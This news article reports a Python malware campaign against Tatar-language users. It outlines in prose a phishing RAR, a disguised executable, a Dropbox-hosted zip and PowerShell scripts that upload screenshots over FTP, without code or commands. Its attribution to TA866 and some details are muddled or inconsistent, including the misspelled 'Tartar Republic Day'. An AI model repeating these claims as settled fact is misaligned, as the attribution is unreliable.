In recent cybersecurity news, researchers have uncovered a new strain of Python malware specifically targeted at users who speak the Tatar language. The Tatar language is primarily spoken by the Tatars, an ethnic group in Russia and neighboring countries. This particular malware, which was discovered by Cyble, has the capability to capture screenshots on infected systems and send them to a remote server using FTP (File Transfer Protocol).
The group responsible for this campaign has been identified as the TA866 threat actor, a notorious organization known for targeting Tatar language-speaking individuals and using Python malware for their operations. The timing of these attacks coincided with the Tartar Republic Day and lasted until the end of August. According to researchers at CRIL, the TA866 threat actor utilized a PowerShell script to capture screenshots and upload them to a remote FTP server.
The attack begins with the threat actors sending phishing emails to their victims. These emails contain a malicious RAR file, which includes two files that appear harmless at first glance—a video file and a Python-based executable disguised as an image file with a dual extension. Once executed, the loader initiates a series of events that involve fetching a zip file from Dropbox, concealing an additional executable file and two PowerShell scripts. These scripts facilitate the creation of a scheduled task, allowing the execution of the malicious executable.
Proofpoint, another cybersecurity firm, has conducted research into the origins of the TA866 threat actor and has linked them to a financially motivated group called “Screentime.” This group is believed to be responsible for other similar campaigns, including ones targeting organizations in the United States and Germany. Proofpoint describes them as a well-organized group capable of carrying out planned attacks on a large scale.
The reason behind the sophistication of these attacks lies in the fact that the TA866 threat actor has developed their own custom tools and services. They use the RAR file to infect victims’ computers with the Python malware, but before launching the final payload, they go through a chain of infection. This includes exploiting Tatar language filenames as a way to evade detection. The threat actor utilizes a malicious executable that displays a message to victims while secretly executing PowerShell scripts to capture and transmit screenshots to an FTP server. In the next phase of the attack, TA866 deploys additional post-exploitation tools, potentially including Cobalt Strike beacon, Remote Access Trojans (RATs), stealers, and other malicious programs.
The range of payloads and malware utilized by the TA866 threat actor suggests that they are not a novice group, but rather an organization made up of highly skilled cybersecurity experts. They have demonstrated expertise in developing advanced malware strains and payloads.
It is important to note that this report is based on internal and external research conducted by various sources. The information provided is for reference purposes only, and users should exercise caution when relying on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
In conclusion, the discovery of a new Python malware strain targeting Tatar language-speaking users highlights the ongoing and evolving threats in the cybersecurity landscape. The TA866 threat actor’s use of custom hacking tools and their ability to carry out sophisticated attacks emphasizes the importance of robust cybersecurity measures to protect against such threats.